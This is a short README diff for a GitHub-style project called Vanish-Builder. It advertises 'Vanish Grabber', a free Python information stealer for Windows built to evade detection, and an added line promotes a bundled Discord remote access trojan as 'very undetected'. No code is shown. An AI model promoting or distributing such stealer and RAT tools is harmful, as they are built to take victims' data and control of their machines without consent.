vanishsoftworks/Vanish-Builder/README.md

 This is Vanish Grabber, a Python-based Windows information stealer designed to evade detection.

 This project is fully open source and completely free, with no paywalls.
+This also includes a discord rat, this is also very undetected

 ---